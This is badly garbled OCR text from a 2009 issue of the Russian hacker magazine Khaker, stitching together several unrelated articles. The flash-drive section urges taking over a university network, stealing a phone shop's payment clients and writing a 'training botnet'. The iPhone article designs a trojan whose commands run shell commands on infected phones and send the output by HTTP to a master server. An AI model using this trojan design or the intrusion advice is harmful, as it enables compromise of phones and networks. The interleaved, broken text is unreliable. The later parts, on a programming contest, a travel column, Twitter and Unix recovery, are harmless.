Допустим,ты студент-раздолбай,тогда флешка поможеттебе достать не
«sсаппег ехе», Ты меломан, как и я?Тогда тебя порадует встроенная
только курсовые
поддержка плейлистов от
поставляется в комплекте с курсачом, Если ты уже поимел всю сеть вуза
Windows Med'la Player и воэможностьих
yTBoero
препода. но и чертежи и прочую хрень, которая
пересоэдания специальнымскрнптом или вовсе автоматически.Вся
и помогаешь COTPYAHI~KaM через RаdmlП раскладывать пасьянс, то
музыка для этого заботливоукладывается в папочку MUZON Если у
можешь пойти прогуляться до ближайшего салона сотовой связи. Есть
тебя 8ключен идентификатор типа «% BASE"/o~=8ASE", то система
шанс заполучить в свои мохнатые руки их платежных клиентов
автоматически скопируеттебе на рабочий стол в отдельную папочку
году оценивай сам, Если тебе и этого мало, то хочу отметить целый ряд
все награбленное добро с флешки
ситуаций, когда. не дай Бог, сотрудник Сбербанка согласится принять
51
в свое время успешно ее ис
пользовал для решения повседневных
задач системного админист
-
8Ы
с твоей флешки отсканированный тобой чек.
ратора, вроде полностью автоматизированной установки и настойки,
Более того, сейчас все на каждом углу в ужасе кричат от эпидемии вируса
например. антивирусов
Сопfiсkег, а чем ты хуже? Неужели, имея в своем распоряжении такой мощ
на компьютерах
юзе ров
Чуть не забыл I Чтобы собственная флешка не ополчилась на тебя,
ный инструмент, ты не 8 состоянии нап исать свой тренировочный ботнет?
неоБХОДИI~О залезть по адресу «Пуск ~ Настройка ~ Панель
Одним словом
управления ~ Система ~ Допоnнительно ~ Переменные среды» и
если немного позаниматься мазохизмом, сойдет любая флешка.::Х::
Х.АКЕР 06 112М О?
- срочно беги искать флеш-диск U3шного типа. Впрочем,
~ 06з
>> В;;:ЛОIY1
~////л Х DOZNP / HTTP,1I0XOD.RU I
каНЬВЯБлаКАХ П!И1ШЕМ ТРОЯН длЯ'
APPLE IPHONE
в прошлых статьях я описал основные уязвимости App:le iPhone, дал инструкции по созданию автоматическогосканера безопас ности на базеточки доступа и рассказал о концепции ботнета для телефонов. Сегодня я подробно опишу создание трояна для
Apple iPhone . •
ФОРМАТ
_
5.
УПРАВЛЯЮЩЕИ КОМАНДЫ
Пятая и шестая части
для отправки конанды
,
- apryMeHTbI
Первые три параметра
-
управляющая часть,
инструкция типа «что сдепать». Вторые три
например:
Первое, с чего надо начать написаниетрояна
• %791.02020202%
разработка формата команды. которую сервер
дунарсдном формате
«куда скинуть результат выполнения». Если
будет передавать клиентам [заражен ны м тел ефо
• %192.168.1.1 OO%/master-server /res.
с этим все понятно, то нечего тянуть резину,
нам). я предлагаю вотта:<ой вид
php?res=%
нонер телефона в неж
параметра
-
OTBeTHa~ часть, инструкция типа
переходим к кодингу.
ПримерЬ! команд:
1~
Команда состоит из шести частей
раsдепе!-t-НЫХ С:V&IВОЛОМ
2.
I
на номер
перsая час'I'Ь:
• at% ДТ-команда. для модема
• sm%
команда отправки еме
• sh%
конанда тепла
(например,
• sh%ping
-с10
15.
Р~lр?гез=% -
«ping www.ru» полнения на
команда аастройки работы самого
команды ИЗ первой части.
• sm%79101010101%TEST is
На.прИМЕ:р:
Все функции Я разнес по отдельным файлам в
зависимости отсмысловой нагрузки. Основной файл trojan.c максимально облегчен от ненужно
'"lWW. ru%0%ws%192.
го кода. Вот список файлов и их назначений
и выслать результат вы
192.168.1.100
• tg%3600%0%0%O%O% артуме:rrы
АРХИТЕКТУРА ПРОГРАММЫ
8Ь!ПОrrnить комаыду шелла
.. \:g%
-
ОК"
+79101010101
whoarni. ping 'NW''''.ru)
з. третьи 'и вторг.я части
ОК%О%О%О%
"test is
168.1.100%/master-server/res.
трояна
trojan. с'
Основной файл с
установить ин
тервал полуqения конанды с сервера
Makef:ile
ИНСТРУКЦИИутилите make для
равным 3БОО секунд
. /cmd:
Разбор С'lраки с командой и эа
i!олнею-rе структуры
4. LfетвеРТБЯ час'1'Ь - ТИП отправки
использовать команды шелла. поэтому оставил
cmd-parser.c
результата КОМОЕДЫ,
все спецсимволы на ИСГiользование в скриптах
crnd-parser.h
знаqения:
..
%~7S% отправка ht.t.р-эап:росом пара
метра
• %sm% ния
064
GET отправка «ВНУТРИ» SМS-сосбще
функ
сборки трояна
Пару слов О разделителе. я максимально хотел
нонет ПРЮiИ1'1ать
main ()
цией программы
ок%<хвост
команды>
~
• sm%79101010101%test is отправить емс стекстон;
"%"
(чтобы можно было выполнять разные там
devJrandom
catl
> Itmр/fuсk-mеmоrу-есопоmу или
. /!.1L tp:
HT'l'P·-клиент. Отправка эапро
l51 I grep (х! и np.l. Таким обраэом, разделите лем стал про цент - %. Что касается общей кон
года три сотни лучших молодых математиков и программистов
собрались в Стокгольме для участия в финале Чемпионата мира по спортивно му программированию АСIV11СРС, главным спонсором I<ОТОрОГО выступает IВМ. По приглашению этой замечательной I<омпании я и отправился в Швецию,
чтобы своими глазами увидеть битву лучших молодыхумов планеты.
«Для решения серьезных проблем нужны
Любая проблема здесь, как бы она ни была
Также намечалось интересное российско-ки
величайшие. уверенные в своих способнос
подана, всегда уп ирается В соста вление
тайское противостояние от Китая традицион
тях умы, способные предложить нестандарт
математических моделей и решение мате
но приехало немало сильных команд, готовых
ные решения.
матических задач. Решений «на пальцах" не
бороться за самые высокие места
-
считает доктор Билл Паучер
[Blll Poucheri, профессорУниверситета
бывает даже если задачку и можно решить
Бзйлор [Baylor UПlvеГSllуJ и исполнительный
тупым перебором. такое решение не пройдет
директор чемпионата ICPC
по ограничениям
-
Их можно
на ресурсы
-
для каждого
Непосредственно фи нальные соревнования
назвать атлетами ИН,lOваций Они выходят за
задания существуют пороговые значен И51 по
проходили В КТН
рамки ограничений и получаютудовольствие,
используемой памяти и времени выполнения.
ческом университете Стокгольма. И ровно в
утра
делая эту работу». Что говорить. спортивное прОI-раммирование
Участники
-
Королевском технологи
9
21 апреля был дан старт соревнованиям
В этом году участникам было предложено
8
штука очень специфичная, стоящая особ
в зтом году представлять Россию поехали
няком от того, что большинство людей вообще
команд ИТМО Iчемпионы прошлого годаl.
оказалась задачка с индексом «А»: ее
привыкли понимать под программированием.
Саратовский ГУ [чемпионы России этого
решили очень быстро и для большинства
Задачи. которые ставятся на соревнованиях
года], МГУ, Алтайский ГУ. Новосибирский ГУ.
команд именно она была первой решенной
по спортивному программированию. несут
СПБ ГУ, Уральский и Южно-Уральский ГУ. Так
задаче~i.
в себе. главныt-:1-0.бразом. математические
же среди участников были такие известные
За
5 часов соревнований было решено 9 из
и алгоритмические вопросы СПОРТИ8ное
вузы как М1Т. Стзнфорд, Оксфорд, Варшав
11
зада ч: зто см огл и сделать две команды
-
1,
Соревнования и итоги
11
задач, наиболее простой из которых
программирование предъявляет к участникам
ский Университет, Университет Карнеги
- ИТМО и Университет Цинхуа Победите
соревнований высочайшие требования в
Меллона и Циньхуа Предматчевые расклады
ля определили по затраченному времени:
области математической подготовки, команд
были простые: команда ИТМО приехала
показав результат в
ной работы и навыков быстрого и чистого
отстаивать статус Чемпионов мира. а все
подряд ЧемпионамVI мира стали ребята из
программи рования
остальные приехали мешать им это сделать:J.
ИТМО!
~
070
1381
минут второй раз
ХАКЕР
06 /126/ 09
~
071
»
сцена
~
links
•
jroc.bavlOГ.edlJ
официальный сайт чемпионата. Тут ты можешь поо~отреть
фото и видео-архив. скачать задания с предыдущих сорев
нований и получить
любую другую инфор мацию о чемпионате.
• WWW.5пагkпеW5.ir1fо -
новости российс
КИХ и международ ных чемпионаТО8 по программ ированию.
• w\Nw.loQcoder·.com -
сайт "сольного»
соревнования для
програММИСТО8.
•
WWW.орепсuр.ГU
открытый чемпионат
МГУ по программиро ванию.
• gQQgle.coIТl! cocJejam - чемпио нат codeJдm. который про водит
google.
• асm.timus.ГU - сай, УРГУ. посвящен
ный олимпиадам по программированию.
Тут размещен выдающийся архив задач и проееряюшая
система.
€)
~
dvd
На нашемдискеты найдешь задачи зто го года. а та кже
подборку фотографий
с финала ДСМ ICPC 2009 в Сто кгол же.
ХАКЕР
06 /1261 09
ФИНАЛЬНЫЕ РЕЗУЛЬТАТЫ
НА3ВАКИЕ ВУЗА
РЕШЕНО
ВРЕМЯ
УНИВЕРСИТЕТ ИТ, МЕХАНИКИ И
9
1381
T51NGHUA UNIVER51TY
9
1800
САНКТ-ПЕТЕРБУРГСКИЙ ГУ
8
1176
САРАТОВСКИЙ ГУ
8
1305
UNIVER5IТY
7
998
7
1117
17
1143
АЛТАЙСКИЙ ГУ
7
125"
UNIVER51TY OF WAR5AW
7
1"13
UN 'УЕ R51 ТУ OF WATERLOO
6
787
1. JAVAKHI5HVILI TBI LI51 5ТАТЕ UNIVER51TY
6
933
CARNEGIE MELLON UNIVER51TY
6
10"5
ОПТИКИ IСАНКТ-ПЕТЕРБУРГ)
OF OXFORD
ZHEJIANG UNIVER51TY MA55ACHU5EH5 IN5TITUTE OF TECHNOLOGY
Вся правда о настоящем и будущем Криса iКасперски Почтовый сервер редакцииIуже несколько месяцев трещит под натиском писем с темой «Крис Касперски». Читателей мучают вопросы: «Что случилось
С мыщъх'ом?»,«Будетли он снова писать статьи?». Сначала мы отвечали, что те пятьдесяткустов дурмана, которые росли у него на делянке, погубил ураган, и прихода больше нет Затем -
что его, с зеркал кой и китайским паспортом,
приняли спецслужбы на территории американского посольства в Сеуле.
1.
вступ ИТЕЛ ЬНОЕ СЛОВО РЕДАКЦИИ
[компания Епdеаvог Security. куда первона
-
чально устроился мыщьх, теперь является
Алиса,
Нет,
у иеня есть кошка
-
I
-
сказала
Ее зовут.
Сейчас мы откроем страшную тайну; что
частью этой корпорацииl.
-
же, на самом деле, случилось, .. Вынуждены
о ездите докладами по хакерским конферен
-- ДаЕНО пора 'гебе рассказать нан о
признаться, после одной из редколлегий
циям;
себе и о СВОих приключениях.'
нам пришлось усыпить Криса
Ic помощью
о ведет с различными издательствами пере
Прекрасно!
-
обрадовался грифон.
Льюис Кзрролл. «Алиса в Стране чудес»
двух сексапильных близняшек, подогнанных
ГО80РЫ по переводу и изданию своих книгза
Андрюшкомl и отдать на опыты в лабораторию
рубежом;
~
экспериментальной медицины, чтобы выпла·
•
судится с посольством Южной Афри ки;
ность повествовагlИЯ,ЭТИ строки пишутся из
титьдолг перед финской типографией (факен
•
егохвостсворачивается в ИВрИI. поскольку в
далекой и загадочной Малайзии -
'~
кризис l ]
Израиле у Криса тоже ки п ят мажорны е дела
.~
It's ajoke, амиго, не волнуЙся:l. В действитель
Какты понимаешь, все это отнимает невероя,'·
пляжей и восточного колорита, Мысли скачут
ности. Крис крутится по всему периметрутак.
ное количество времени и сил, НО он планирует
сайгаками по колдобинам, от избытка впе·
ЧТО ды М из ушей идет:
вновь писать в:н:. и ВОТ тому подтверждение,
,~
<
('
~
• работаеl' независимым консультантом в
~
подразделении
~
занимаются разработкой НIРS/IРS-систем
~
~
"" ~
1
Да простятмнечитатели некоторую сумбур
~
074
McAFee,
сотрудники которого
страны
самобытной экзотики, роскошных песчаных
чатлений ТОПОРЩИТС\1 шерсть, и хвост встает
Аыбом, потому как потрясающе красивых
-
у тебя есть свой конек?!
ДеПИ1сатес,
--
спросил
девушек здесь больше, чем буддистских
монахов, предлагающих проголосовать за
ХАКЕР
06 11261 09
....
I
ML1P,
.... , /
(:цен.:.
ПрL1чем ОДИН голос стоит не меньше
сотн" рентген, а то и двести. На наши деньг"
-7500
рублей. Дорогой мир, однако
ЛЕНИВЫЕМАЛАЙЦЫ Большой неОЖL1данностьюОl(азалсяДЛЯ меня ужасаlОЩИЙхолод, вынуждающийтаскатьс собой
свщер, И ЭТО ПрL135 градусах по Цельсию! Ну, в
А все почему? Преступлений ЧТОЛL1 меньше?
мы, значит, в чулане у раджи, прямо на обо
TeHL135, а во всех остальных местах понатыканы
Так ведь ни xBocTa l Карманы L1 барсетки
чине свальной борозды, долБL1М этот«поtа dгug» L1 rOBOpL1M за все дела KcтaTL1, "ндусы
КОНДИЦL10неры, рабстаЮЩL1е на полную мощность.
режут прямо в центральных аэропортах. Бай
Только L1 ищешь, где бы согреться И еще ищешь,
керы срывают сумк" на ходу, Гопы сначала
к малайкам абсолютно параллельны. Они на
чего бы эаТОЧL1ТЬ. Малайская еда вкусная, дешевая
бьют по голове, а уже потом смотрят, что ы
них насмотрелись, "м латинок подавай.
lяблочны й сокдороже обедаl, но совершенно не
карманах у жертвы. Криминальная r-роника в
в ОТЕЛЕ, НА ТОПЧАНЕ
КЗЛОРL1йная, а потому быстро переваривающаяся
газетах -
Девушки здесь цвета радуги - яркие одежды,
зачем только я ее читал перед тем, как сюда
Сами малайцы только о русских девушках и говорят, хотя МНОГL1е их никогда "е видели. Оно,
вообще кошмар на улице Вязов И
пестрые ;<раски. П ра ктически все читают Коран
поехать? I Первы~ ден ь провел на KOHKpeTHO~1
L1 ходятв платках, L1 сам" малайцы жалуются на
L1змене, ОЖL1дая подвоха, но потом махнул
конечно, понятно. РУССКL1едля HL1X -
то, что под юбку к ним так просто не полазишь Ну,
хвостом. В МНОГОМL1ЛЛИОННОЙ Куала~Лумг>ур,
а самые красивые
экзотика,
- это еврейки, причем с ав
насчет «не полаЗL1ШЬ» они слегка ПОГОРЯЧL1ЛИСЬ.
конечно же, не обходится без преступлениЙ.
томатом_ Девушка С оружие'м в руках выглядит
ЭТООНL1 сравнивают малаек с американками,
Вот только никто не делает L1з этого трагедии
сексуально, особенно если она только после
которых видели только по телевизору и о которых
мирового масштаба L1 не живет В посто
армии (в ИзраL1ле все деВУШКL1 служат) и со
товаРL1ЩИ. побывавшие в AMepL1Ke, рассказывают
янном страхе, что сейчас ограбят, убьют,
СПОРНIВНОЙ подготовкой У нее все в порядке
вся кие бай KL1, как эападные женщины готовы лечь
изнасилуют и даже "мен" не спросят. Не, на
Гуляешь с такой по ночному городу и чувству
под первого встречного, Малайцы слиш ком ле
самом деле меня тут едва не изнасиловаЛL1,
ешь себя в полной безопасности.
нивые, чтобы ухаживать, Адевушки тут .. TaKL1e же,
И руку на грудь клали, и за хвост хватали, и
Еврейки мыщьху настолько понраВИЛL1СЬ, что
каки везде. особенно еслиучесть, что малайцев В
только когда она поняла, что ей с подругой
он даже HI~ с кем не переспал И ка к это я так
Малайзии нетакуж и MHoro. TYPL1CTOB - куда боль
ничего не обломится, натуральным обра
отличился, не понимаю
ше. Китаянки, японки .. , ПРL1веТЛL1вые, открытые и
30М выстаВL1ла за дверь А дверь эта была
связано с сильной усталостью Я же сюда не на
оБЩlЛельные. AMepL1KaHCKL1e девушки также легко
в деревне. И такси там по~мать нереально.
отдых приехал, а на работу. К вечеру настолько
идут на контакт. осооенно в местах вынужденного
Общественный транспорт ходит по непонят
выматываюсь, что сил хватаеттолько на то, чтобы
заключения, типа аэропортов и прочих домов
ным траекториям. Благо, хоть ТWlп-Тоwегs
посидеть с коллегаМL1в ресторане, после чего
терп и!"юсти Легкость, с которой он и переходят на
(небоскребы «Башни Близнецы Петронас»1
вернуться В отел ь и завалиться на топ ча н. Нату
обсуждениеличных проблем, просто поражает,
были видны, и мыщъх, как дурак, шел по
ральный такой топчан. На который и девушку-то
но
азимуту четыре часа, пока не добрался до
пригласить стыдно. Аеще называется «хороший
продолжение, Знакомство ~ это одно, а ни к чему
цивилизации
отель», где на второй день половые стащили
не обязывающая беседа - совсемдругое.
се~час ограбят, убьют, изнасилуют. Так ведь
свое же собственное покрывало L1 пришлось
нет ' Не ограБИЛL1, не убили, не юнасило
долго разбираться с менеджером, на хвоста они
это вовсе незначит, что знакомство получит
ОГРАБЯТ, УБЬЮТ, ИЗНАСИЛУЮТ
И все время думал
ну вот,
вали. Малайзия в зтом плане интересная
Хотя, скорее всего, это
это сделали. У нас в отелях, конечно, тоже воруют,
страна. За наРКОТL1КИ приговаривают к смер
но воруют осмысленно и по понятиям
Вообще говоря, люди здесь удивительно дру
тной казни, но все какбы в теме, L1 у всех есть
Зато у них можно спокойно посидеть с де
желюбные, привыкли улыбаться и общаться.
«very speclal stuff, поt а drug» И вот CL1AL1M
вушко~ В очень дорогом ресторане за ее счет.
ХАКЕР ОЬ
'1261 09
~
075
thPqJJ
:fl:-"=# ..... .~.. о
LJ
О
1]
сцен.:.
о о
\I :~
~e? о
о
:fp f,~e~, С.I О
о
r.:
~
'~"' о
;J
Мыщъх сидел с тремя, причем две из них замужем Одна из Америки, остальн ые
- змигрантка
- коренные израильтянки Все образованные
Атаки следую]' непрерывно,так что лучшего места для тестирования систем обнаруженияи предотвращениявторжений, пожалуй, не найти,
и начитанные, умные до невозможности, И ВОТ сидим мы, Значит, В рес
Не могу умол чать О том, ЧТО в октябре п рошлого года здесь про води
торане под открытым небом На улице уже зима, ночь Слегка прохлад
лась конференция HITB [Hack In The Вох), посвященная различным
но, но еще не холодно, Мимо нас идут ЛЮДи, а мы пьем пиво [ну, это она
аспекта,~ инфор,~ационнойбезопасности На ней я представил
пьет пиво, а мыщьх -
доклад о найденных мной недоработках в процессорах Iпtеl, которые
вишневый сок) и обсуждаем OpenBSD, ламповые
усилители HiFI-класса, критикуя беспроводные колонки и прочую
позволяют использовать уязвимости как непосредственноСИДЯ за
потребительскую муть, Оказываеl'СЯ, у нее трое детей, она ученый и
компом, так и удаленно, вне зависимости от операционной систе
большой меломан, Ассемблер
- это так, невинное хобби
мы, установленных обновлений и приложений, Но зто уже тема для отдельной статьи ..
~ '1
АТАКИ СЛЕДУЮТ
НЕПРЕРЫВНО
P.s.
Что касается хакеров, то G Малайзии они тоже наличествуют, причем
Frою:
практически всеза,шкаются на сетевой безопасности,дизассембли
ТWIТТЕR-БУМ Мало- помалу вставать на ноги сервис начал к концу2006
-
началу2007 года «Новообращен
ХАКЕР оь 112М
09
What is Twitter?
.. Watch:5 video!
--
-------
Please sign '" use.r nэmе
сг еmзil эС'drеss:
~.passwOf(]:
Twltter is а service (ог frienas, family, апа co-wor1<ers 10 communicate апс! slay connectea through Ihe exchange о! quick. frequent answers 10 опе simple que9Uon: What аге уои aoing?
---1
o\,J;еIЮУU~/1oOIт
...,t'Q!"fr:>f"l
)o:..
.. I - .
'i\vltt~ is сп Ц V;I!J'I 10 ~ccrritl9It1en'9!l$«app.
ifYOLlar!nl faJТ4ar\"IA1'II';"/IttC'f.
Ld c.МI ofttlose Lt:jr:gs. м.:~
\.I.y'$P.oe.lh'ISCtJl"I:::S;'II~
tll:liollousands!upi::f \"I"'tA)'CU
f:tsr
h.ta~ "Ьсщ!
t. 8Ltt Cl10t YC.II
J." e.tr.
AmuO(!..CIC<'I'I. S.rUtt'
Ms~
SI'r1lJSJ'gityollrt"~I'IoV(
fШCI'! (\IJI ~ ь.
Eric tI"шm. Allth«
с:1 Тм ~ad
T,••'tIf:~1
ТЕМУ ПТИЧЕК ные» наконец-то начали «подсаживаться» на
зались не готовы. Было подсчитано, что в 2007
работали. Голый костяк Тwittег«оброс» полез
Twitter, как и было задумано его создателя ми.
году Twitter оставался в рабочем состоянии 98%
I1ЫМИ функциями
Появились первые симптомы широко рас
времени, то есть набралось П04ТИ 7 полных суток
постоянными ссылками на сообщения и тому по
пространенного сегодня заболевания - люди
просто~. В периоды dоwпtimе по адресу Iwilter.
добными необходимыми мелочами, Разумеется,
комментировали в Twitter каждый свой ша Г,
согп отображалисьразнообразныекартинки
с каждым нововведением интерес обществен
причем в буквальномсмысле. Один из первых
на тему птиц, например,знаменитый fail whail
ности к сервису только усиливался.
твитов от разработчиков оказался n ророческим.
-
"О, зто будет вызывать привыкание» [oh this IS
вают крохотные птички. Все зто сопровождалось
падающий кит, которого в воздухе поддержи
- чатом, R5S-трансляцией,
Наиболее значимым и заметным витком в популярюацииТwittег, пожалуй, стали прошло
going to Ье addictivel, - написал в марте 2006
сообщением: «Слишком многотвитовl Пожалуй
годние президентские выборы в США. После
Дo~! Саголла и оказался совершенно прав.
ста, подождите немного и попробуйте еще раз».
того как сервис стал одним ИЗ инструментов в
Камешком, породившим настоящуюлавину, стал
Сетевое сообщество, уже изрядно пристрастив
предвыборной борьбе (многие политики завели
ежегодн ый фестиваль музыки, кино и интер
шееся к сервису, не преминуло породить КУ4У
tWltter-аккаУНТbI), серверы только каким-то
активныхтехнологий 50uth bySouthwest. Пока
карикатур на данную тему.
4УДОМ не на4али снова падать. П и к активности при шелся непосредствен но на день выборов
длилось мероприятие, шепот,ДО ЗТОПDлишь робко шелестевшийо TwitterB интернете, перешел
ДЕНЬ ВЫБОРОВ
в быстро нарастающийгул.
Пол ностью избавиться оттеХНИ4еских проблем
5XSW - один из
посещаемость подскочила на рекордные 43%1
крупнейших музыкальных фестивалей в США, так
удалось только к 2008 roAy, сделав необходимые
КУПЯТ НЕ КУПЯТ
что его всегда очень красочно освеща ютв СМ И
изменения ВДlЗижке и переехав на серверы
Воттак незаметно мы добралисьдо нашихдней.
и, коне4НО, в Сети. Twitter же помогупроситьпро
Аmаzoп 53, В целом, именно 2О08-й, стал для
Можно, конечно, еще долго сыпать цифрами и
цесс "написанияпоста в блог» до макси мума, а на
Twitter реша ющим годом. Сервис не только
переч ислять статистические рекорды Twitter, но
SXSW оказалось немало пользователей молодого
продолжилстремительныйрост, поража~
если взглянуть на картину в целом
сервиса. Твиттеряне-первопроходцы комменти
даже собственныхсоздателей,но и вошел в
изменился за последн ий год. Появился лишь ряд
ровали шоу в режиме реального времени,уСТрОИВ
фазу активных перемен. Так, в свете растущей
приятных дополнен ий, вроде нормального по
практически живой стриминги координировали
популярностиот Obvious Согр отдел илась
иска, который разработчики попросту выкупили
свои действия с помощью того же Twitter. В итоге,
самостоятельная компания Twitter Iпс., которую
у другой команды и прикрутили К са Йту. В штате
детище Дорси заработало на фестивале награду
возглаЕИЛДжекДорси,а Obvious в зто время
Twitter Inc. сейчас работает порядка 30 человек и,
«best blogging tool» и, что более важно, - рекламу.
поглотила ПО4ТИ не подающая признаков жизни
какни странно, они пока не стали миллионерами,
С зто го момента интерес к Tw,tter принялся расти
Odeo. Примернотогда же у Twitter появились
хоть их компанию и оценили в 250 миллионов
в геометрическойпрогрессии.
и новые инвесторы. По некоторым прогно
долларов
Еще несколькокрупных событий 2007 года, таких
зам, стоимостьсервиса с каждым годом будет
если, коне4НО, не считать монетизациейнедав
как MТV М usic Awards и Apple WWDC 2007, завер
возрастатьна миллиарддолларов(правда, 1'10
нее открытиеяпонскогофилиала 'NWW. twitter.jp,
шили начатое SXSW, заставив весь мирзагово
други м прогнозам. через нес колько лет сервис
рить о TwitterKaKo новом уникальном явлении.
не будет стоить ничего
Число пользователей стремительно росло
ком поспешили поддержать весьма известные в
действительно послужила огромная численность
всем хотелось попробовать «эту новую штуку" В
Кремн иевой долине вен чурные фонды - Uпiоп
японского ТЕипер-сообщества, неизвестно. Да
действии. Кделу продвижения Twitter в массы,
SquагеVепtuгеs,
вать какие-либо комментарии по поводу возмож
помимо «сарафанногорадио» ПОДКЛЮ4ИЛИСЬ
Garage, Spark Capital, а также инвестиционная
СМИ. В результате,у сервиса началисьпробле
компания Bezos Expeditions, принадлежащая
коллеги неторопятся.А междутем, эта проблема
мы с работоспособностью.Хоть разработчикии
Джеффу Безосу - основателю Аmаzoп.соm. А
не так уж проста, ведь многие юзеры пользуются
ожидали, что их детище в один прекрасный день
разработчики в зто время не только супоением
сторонними twittег-клиентами,минуя сайт или,
станет популярным, н О к такому безумиюока
медитировали на цифры посещаемости, но и
вообще, «общаются» с сервисом через SMS.
ХАКЕР
06 11261 09
:IJ. Перспективный
дот
Charles RiverVentures, Digital
-
сервис мало
Twitter до сих пор не монетиэировался,
где «все тоже самоетолько на японском и с рек
ламой». Был ли зто пробный шар, или поводом
ной схемы получения oTTwitter денег, Дорси и его
~ 081
Говоря о деньгах, нельзя не упомянуть, что безостановочнорастущий дотком уже пыта лись купить. В началетекущегогода
I
Facebook
предлагал за Twitter пол миллиардадолларов,
/
неизвестно, ~o многие ана
литики сходятся во мнении, что акции
""
cI'<5"'1'~ <.1.,3'
j/
имен~о причинам руководствоТWlttеготвергло
-
0[(;(
,1
но не деньгами, а своими акциями. По каким
зто предложение
!/
СЗJJ!Jf c~
l'
Facebook
сильно переоценены. А в последний месяц и вовсе появились слухи о том, чтотеперь
TWltter
ведет переговоры с Google, но никаких коммен
тариев и подробностей ~e последовало. Ну а в Сети, тем временем, как грибы после
дождя, появляются твипер-клоны (кто-то, возможно, предпочтет формул и ровку «другие
сервисы для микроблоггин ra»l. Как бы там ни было, пока ни один из них не представляет
для Twitter серьез~ойугрозы - «Чири калка»
·... Н.'·
~";'1:l1
уверенно оставляет позади всех KO~KypeHTOB.
По последним данным, Twitter занимаеттретье место по популярностисреди социальн ЫХ сетей
чрезвычай~ые ситуации и рассматривать
[Facebook и MySpace все ещелидируютi, и су
Twitter не ка к удобный инструме~т, С помощью
масшедшая цифра годового при роста пользова
которого МОЖНО быстро и оперативнодонести
телей
информациюдо«всея интер~ета»,то картина
- 1382% сsидетельствует, что в будущем у
вырисовываетсяне столь радужная Доста
него есть все шансы возглавить зтоттоп.
Факты и цифры
точно взглянуть на списки людей, которых
ПУСТЫШКА
актиsнее scero «фоловят» [от а~гл. foHow
ИЛИ ГЕНИАЛЬНОЕ
«следоватьза кем-то». Фолловеры в
Twitter
ИЗОБРЕТЕНИЕ?
- аналогфрендов sЖЖ): Бритни Спирс, Опра
Об истории и становле~иисервиса уже сказано
Уинфри, Эштон Катчер [Катчер, кстати, не
более чем достаточно, но, кажется, ответов
давно поставил рекорд и первым взял пла~ку
на поставленныев ~ачале вопросы мы так
в миллион Фолловеров), Арнольд Шварце
и не получили. Чем же Twitler превосходит
неггер, Барак Обама, ЭЛ Гор и далее, далее,
другие средства сетевой коммуникации,откуда
далее ... ВН!-1ма~ие к Twitter сейчас во многом
взялась сумасшедшаяпопулярностьи в чем
привлекаютзнаменитости, которых здесь в
удобство и привлекательностьмикроблоrгинга?
избытке. Мы совсем ~eдaB~O писали О том, что
На самом деле, вывод напрашиваетсянеутеши
после пришествия в Тwittегужеупомянутой
тельный -
теле8едущейОпры Уинфри, сервис струдом
похоже, сегодня модно и удобно быть
ленивым. Нет, разумеется, у медали
TWllter есть
выдержал наплыв американскихдомохозяек.
Шу'гка ли, вденьее регистрации посещае
светлая сторона.
Короткие сообщения максимально инфор
мость подскочила на
мативны и начисто лишены «воды» (которая
у миссис Уинфри было
24%, и уже через 2 часа
просто не умещается в 140 символов). Плюс,
Из этих цифр и другой похожей статистики
TWltter порой реагирует на события, про
напрашивается довольно очевидный вывод
исходящие в мире, быстрее любых СМИ. и
о конти~ге~те сервиса. Само собой, интерес
100.000 фолловеров.
помогает максимально быстро получать и
ные люди есть 8езде, и я даже составила для
сортировать практически любую информацию.
тебя небольшой список, кого стоит почитать,
Если приводить глобальные и наиболее яркие
но все же общая тенденция не слишком
примеры, то во время террористического акта
радует Читатьлайфстрим людей, которые
раздутой из ничего, vo гениальным изобре
в Мумбаи, произошедшего в
педантично рапортуют отом, что выпили кофе,
тением. Хотя сер8ИС и строится на давно
2008 году, свиде
тели происходящего отправляли по -·80твитов
позавтракали, сходили в магазин, посмотрели
известных и проверенных вещах, это не
в 5 секунд, докладывая обстановку, а другие в
какой-то фильм и т.п.
отменяет того факта, что он может быть
зто время помогали составлять списки убитых
вольствие. И таких едва ли не большинство.
полезен, интересе~, а главное
и раненых. Похожая ситуация сложилась и с
Вданном случае ограничение в 140знаковрабо
оперативен. Иметь twittег-аккаунт сегодня
рейсом
-
сомнительное удо
-
очень
тает скорее против TWltter. чем за. Ритм современ
удобно: одно дело читать с мобильника
вершил аварийную посадку на воду реки Гуд
ной жизни диктует свои условия, и зачастую чем
ленту друзей в ЖЖ и совсем другое
зон, в Нью-Йорке - один из очевидцев сделал
компактнее подана информация, чем проще ею
ле~ТУТWlttег. Из-за подобной доступности и
1549,
который в начале
2009
года со
фото места катастрофы и отправил его в
- читать
поделиться. а чем быстрее она «проглатывается».
простоты микроблоги В будущем явно про
еще до того, как на место прибыли спасатели и
тем лучше. Но все же краткость не всегда сестра
должат пользоваться популярностью (зто не
пресса. При годился Twitter и австралийским
таланта, И стиль те KC1'a а-ля
значит, что они затмят собой обычные блоги
пожарным, когда в начале 2009 горела едва
препинаний, с кучей сокращений, упрощений
и социальные сети, а затем поработят мир,
ли не вся Австралия
и едва ли не 1337'ом, уместен далеко не всегда.
ведь с появлением кино люди не перестали
население оператив~о оповещали о текущей
Тwittегже, фактически, принуждает своих юзеров
читать и ходить в театр, а после появление
обстановке в охваченных пламенем зо~ах> И
писать именнотак, ведь на счету каждый символ.
интернета не умерли печатные СМИJ. Прос
подобных примеров наберется немало.
Подводя итог, скажу, что, пожалуй, равно
то не нужно забывать о том, что порой
Однако если не принимать во внимание
ошибочно называть
символов недостаточно Х
~
-
Twitter
с помощью сервиса
SMS - без знаков
TWltlef'
и пустышкой,
t=1!,~:
140 РЕ Л,
082
ХАКЕР
06 11261 09
·,
~.
Р:i:::я на осуществление тел:~изи:нного вещання Серия ТВ I }
bl
• .
.; ~
N!7632
от
16.0;.2003.
выдана Минпечати рф. ,
[ОГЕНИЙ «J 1М» ЗDБНИН
/ZOBNI NIi!G"4AIL.COM/
МАСТЕР-КЛАСС ПО РЕАНИМАЦИИ НИКСОВ M1eToAbI борьбЫ
со сбоями
Linux и Free'BSD
UNIХ-подобныеоперационныесистемы устроены так, что если в них что-то ломается, то они не пытаются самовосстановиться,
а честно сообщаюто случившемся.Дальнейшая судьба операци онки зависитот квалификациивладельца компа: новичок сразу затеет переустановку,матерый же юниксоид спокойно загрузится
с L'iveCD, наберет в терминале несколько команд и отправит комп на перезагрузку, довольно усмехнувшись. Дизайн UNIX настолько прост и прямолинеен,что ОС можно поднять с колен, в каком бы
.
состоянии она ни находилась
•
Всего существуетшесть классов проблем, с
другой операционнойсистемы уже возведе
Команда «find /boot/grub/stage1», введенная
которыми сталк!'tваютсяпользователиниксов:
